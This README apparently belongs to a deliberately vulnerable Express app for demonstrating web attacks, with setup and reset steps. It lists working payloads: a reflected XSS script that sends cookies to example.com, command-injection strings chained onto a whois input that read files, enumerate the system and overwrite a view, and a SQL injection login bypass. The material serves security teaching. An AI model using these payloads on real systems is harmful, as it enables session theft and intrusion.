Tactical Exploit

A quick and dirty express app with exploits used for demonstration purposes.

• SQL Injection
• Cross-Site Scripting (XSS) (maybe using metasploitable)
• Command Execution
• Reflected XSS

Install dependencies

npm install

Also make sure your OS has whois installed and available, it's used by the "command execution" vulnerability.

Start the server

npm start

Point your browser to http://localhost:3000/

Use a different port, for example port 3030:

PORT=3030 npm start

Stop the server with CTRL-C

Reset the database

1. Stop the server if it is running using CTRL-C
2. npm run deletedb
3. Start the server, it will recreate the database: npm start

Reset the code

The command execution exploit allows you to write an exploit that can overwrite the code!

Reset the code using:

npm run reset

Clobber code changes and the database

Get it all done in one go (database reset, reset code)...

npm run clobber

Reflected XSS

Path: /reflected-xss

Query input:

<script>window.location='http://example.com/?cookies='+document.cookie</script>

Constructed link:

http://localhost:3000/reflected-xss?q=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Fexample.com%2F%3Fcookies%3D%27%2Bdocument.cookie%3C%2Fscript%3E

Command Execution

Path: /command-execition

example.com && export

example.com && pwd && ls -la && cat package.json && ls -l views && echo "Mwuahahah" > views/compromised.ejs

example.com > /dev/null|| pwd && ls -la && cat package.json && whoami && groups && uname -a|| ifconfig

Cross-Site-Scripting (XSS)

SQL Injection

• Bypass browser side validation: use developer tools to add novalidate attribute to the form
• Username: bob" or 1=1--
• Password: anything